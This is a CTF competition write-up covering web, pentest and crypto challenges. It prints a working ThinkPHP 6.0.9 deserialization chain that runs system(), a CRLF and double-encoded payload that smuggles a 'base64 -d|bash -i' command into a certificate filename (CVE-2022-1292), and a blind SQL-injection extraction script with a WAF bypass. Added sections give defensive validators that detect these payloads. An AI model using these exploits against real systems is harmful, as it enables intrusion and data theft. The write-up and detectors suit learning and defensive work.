If the challenge setters can't write challenges, they don't have to write any.
A web player turned into a crypto player; a great victory for cryptography.
Web: ezpop. Directory scanning turned up the source code www.zip, and in it the deserialization trigger point.
Reference: "ThinkPHP 6.0.9 deserialization reproduction and integration" (Thinkphp6.0.9反序列化复现及整合), 先知社区 (aliyun.com)
An exp found online:
```php
<?php
namespace think {
    use think\route\Url;

    // Stand-in for think\Model: only the properties the chain needs are declared,
    // with the same names and visibility as in the framework so the serialized form matches.
    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;

        public function __construct()
        {
            $this->lazySave = true;
            $this->withEvent = false;
            $this->exists = true;
            $this->table = new Url();   // the table is a Url object, which continues the chain
            $this->force = true;
            $this->data = ["1"];
        }
    }
}

namespace think\model {
    use think\Model;

    // Concrete subclass used as the entry object of the chain
    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }

    // Serialize the entry object; the URL-encoded string is the payload to send
    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {
    use think\Middleware;
    use think\Validate;

    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;

        public function __construct()
        {
            $this->url = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app = new Middleware();
            $this->route = new Validate();
        }
    }
}

namespace think {
    use think\view\driver\Php;

    class Validate
    {
        public function __construct()
        {
            // callable looked up under the 'getDomainBind' key
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }

    class Middleware
    {
        public function __construct()
        {
            $this->request = "2333";
        }
    }
}

namespace think\view\driver {
    class Php
    {
        public function __construct()
        {
        }
    }
}
```
online_crt: after downloading the source I found that openssl is used, and there is a recent command injection bug, CVE-2022-1292.
The injection point is here:
The filename can be modified through the rename endpoint written in Go.
First the two checks on url and host have to be bypassed, which can be done with CRLF injection through the Python Proxy route.
The overall flow: first POST to getcrt to obtain the crt certificate, then use CRLF to bypass the checks and change the filename.
request.form.get reads values from the POST form, while at the same time the route only allows GET, so the following request can be constructed to bypass this:
c.Request.URL.RawPath refers to the URL before decoding.
payload:
```text
%2F%2561dmin%2Frename%3Foldname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%26newname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%2522%253Becho%2520Payload%253D%257Cbase64%2520%252Dd%257Cbash%2520%252Di%253Becho%2522%20HTTP%2F1%2E1%0AHost%3A%20admin%0AUser%2DAgent%3A%20admin%0AAccept%2DEncoding%3A%20gzip%2C%20deflate%0AAccept%2DLanguage%3A%20zh%2DCN%2Czh%3Bq%3D0%2E9%0AConnection%3A%20close%0A%0A%0A
```
Finally, visit createlink to trigger it.
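The two things that made this chain work are double percent-encoding (%2561 only becomes "a" after a second decode, so a check on RawPath sees something different from what the backend uses) and a CR/LF that splits the proxied request. The following is an added example, not code from the writeup or from the challenge: a Python check for a rename endpoint that decodes to a fixed point first, rejects CR/LF, and only accepts plain .crt basenames for oldname/newname, so nothing shell-like ever reaches the c_rehash sink. The endpoint shape and the `SAFE_CRT_NAME` pattern are assumptions; the payload it is run against is the one from the writeup above.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Assumed policy: a plain basename ending in .crt, nothing c_rehash could read as shell syntax
SAFE_CRT_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.crt$")

# The payload from the writeup (double-encoded path with an injected request line)
WRITEUP_PAYLOAD = (
    "%2F%2561dmin%2Frename%3Foldname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt"
    "%26newname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%2522%253Becho%2520Payload"
    "%253D%257Cbase64%2520%252Dd%257Cbash%2520%252Di%253Becho%2522%20HTTP%2F1%2E1%0AHost%3A%20admin"
    "%0AUser%2DAgent%3A%20admin%0AAccept%2DEncoding%3A%20gzip%2C%20deflate%0AAccept%2DLanguage%3A"
    "%20zh%2DCN%2Czh%3Bq%3D0%2E9%0AConnection%3A%20close%0A%0A%0A"
)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing (bounded, so a pathological
    input cannot loop forever). Validating anything else means validating a
    different string from the one the backend acts on."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def check_rename_request(raw_path):
    """Return (accepted, reason) for a rename request, judged on its fully decoded form."""
    decoded = fully_decode(raw_path)
    # Check for CR/LF before any URL parsing: urlsplit silently strips newlines,
    # which would hide exactly the smuggled request line we want to reject.
    if "\r" in decoded or "\n" in decoded:
        return False, "control character (CR/LF) in decoded request"
    parts = urlsplit(decoded)
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in ("oldname", "newname"):
        values = params.get(key, [])
        if len(values) != 1:
            return False, f"{key} missing or repeated"
        if not SAFE_CRT_NAME.fullmatch(values[0]):
            return False, f"{key} is not a plain .crt basename"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample requests alongside the writeup's payload
    for sample in (
        WRITEUP_PAYLOAD,
        "/admin/rename?oldname=cert-1.crt&newname=cert-2.crt",
        "/admin/rename?oldname=a.crt&newname=a%3Bb.crt",
    ):
        print(check_rename_request(sample))
```

Run stand-alone it prints one verdict per sample; the writeup's payload is rejected as soon as the first decode exposes the %0A line breaks, and a single-encoded ";" in newname is rejected by the basename pattern rather than by any blacklist of shell characters.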
Ezpentest https://ctfking.com/2022/032432393.html
The challenge setters used a WAF to make us guess; that's just nasty. Two hints were released, and the challenge only became solvable after the scoreboard froze.
~ is filtered, so the payload from the article needs a change: ~0+1+'' becomes !0+18446744073709551615+1+''.
Integer overflow can likewise be used for error-based injection.
Just take the script from the article:
```python
import requests

url = 'http://xxx/login.php'
proxies = {"http": "http://127.0.0.1:8080/"}
flag = ''
for _ in range(1, 50):
    for ch in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789^!?$':
        temp = ch
        # Characters with special meaning in the pattern are escaped before use
        if temp in '^!?$':
            temp = "\\\\\\" + temp
        payload = {
            'password': 'xxx',
            # Boolean oracle: a matching prefix makes the CASE branch overflow BIGINT UNSIGNED,
            # which raises an error and shows up as HTTP 500
            "username": f"'||case`password`like'{flag + temp}%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'",
        }
        response = requests.post(url=url, data=payload, proxies=proxies)
        if response.status_code == 500:
            flag += temp
            print(flag)
            break
```
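The WAF here blocked "~" and was sidestepped by writing the same overflow with "!0" and the BIGINT UNSIGNED maximum. As an added example (not part of the writeup), the following Python contrasts that character blacklist with a check that normalizes the field first and looks for the structure of the oracle: the quote-escaping "||", the CASE/WHEN/THEN/END construct, and an overflow trigger in any of its spellings. The "naive WAF" is an assumption modelled on the page's observation that only "~" was filtered; the two payload strings are the article's and the writeup's variants.

```python
import re
from urllib.parse import unquote

MYSQL_UINT64_MAX = 18446744073709551615  # largest BIGINT UNSIGNED; adding 1 is an out-of-range error

# The article's original oracle and the writeup's variant that avoids '~'
ARTICLE_PAYLOAD = "'||case`password`like'a%'COLLATE'utf8mb4_bin'when'1'then~0+1+''else'0'end||'"
BYPASS_PAYLOAD = (
    "'||case`password`like'a%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'"
)


def naive_waf_blocks(value):
    """Assumed behaviour of the challenge WAF: reject the field only if it contains '~'."""
    return "~" in value


def normalize(value):
    """Undo the cheap obfuscations visible in the payload before matching:
    percent-decode, turn the backticks that glue `password` to keywords into
    spaces, collapse whitespace and lower-case everything."""
    v = unquote(value).replace("`", " ")
    v = re.sub(r"\s+", " ", v)
    return v.lower()


SIGNALS = {
    # boolean oracle built from CASE ... WHEN ... THEN ... END
    "case_when_oracle": re.compile(r"\bcase\b.*\bwhen\b.*\bthen\b.*\bend\b"),
    # breaks out of the quoted literal and compares with LIKE
    "quote_like": re.compile(r"'\s*\|\|.*\blike\s*'"),
    # overflow trigger in either spelling, or the max constant being added to
    "uint64_overflow": re.compile(rf"(?:~0|!0|{MYSQL_UINT64_MAX})\s*\+"),
}


def sqli_signals(value):
    """Return the names of the injection signals present after normalization."""
    v = normalize(value)
    return [name for name, pat in SIGNALS.items() if pat.search(v)]


if __name__ == "__main__":
    for sample in (ARTICLE_PAYLOAD, BYPASS_PAYLOAD, "alice"):
        print(naive_waf_blocks(sample), sqli_signals(sample), sample[:40])
```

The point of the contrast is the middle line of the output: the blacklist passes the rewritten payload while the structural check still reports all three signals, because the oracle's shape did not change, only the spelling of the overflow.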
Password: (a rather weird string; forgot to save it)
The account is not admin; injecting a bit further showed it is this thing:
But I still couldn't log in, no idea why. In the end there wasn't enough time to check whether the flag was in another table. Unbelievable.
Crypto: 签到电台 (sign-in radio). Get the hints.
Get the codebook from the challenge and write a script according to the hint:
```python
key = "2912 3414 5162 6502 4914 3233 4313".split(" ")
flag = "1732 2514 1344 0356 0451 6671 0055".split(" ")
res = ""
# Add each codebook group to the corresponding ciphertext group digit by digit, modulo 10 (no carry)
for i in range(len(key)):
    for j in range(len(key[i])):
        res += str((int(key[i][j]) + int(flag[i][j])) % 10)
print(res)
```
基于挑战码的双向认证 1 and 2 (challenge-code-based mutual authentication): unintended solution; the permissions on the root directory weren't configured, so the flag could be read directly.
基于挑战码的双向认证 3: again unintended; root's password is the weak password toor, so just su root.
ISO9798: first solve the proof-of-work:
```python
import hashlib
import string


def sha256(s):
    return hashlib.sha256(str(s).encode('utf-8')).hexdigest()


total_sha256 = 'd0320fe0ec98bde37c5ed7f87d7d2624cccc0d87c247e91ca44f00874f06f2c8'
know = 'VN6HjfueM7Uj8q5E'
dic = string.digits + string.ascii_letters


def findsha256(know, total_sha256):
    # Brute-force the 4 unknown leading characters; the known suffix is appended to each guess
    for i in dic:
        for j in dic:
            for k in dic:
                for l in dic:
                    tmp = i + j + k + l + know
                    if sha256(tmp) == total_sha256:
                        print("success:" + i + j + k + l)
                        return i + j + k + l
    return None


findsha256(know, total_sha256)
```
Step two asks for a 128-bit random number; just fill in the required number of digits to reach step three.
Step three returns a 96-character string. Looking at the encryption scheme, it has three components, so try splitting the string into three equal parts and, as the challenge requires, concatenate the second part and the first part.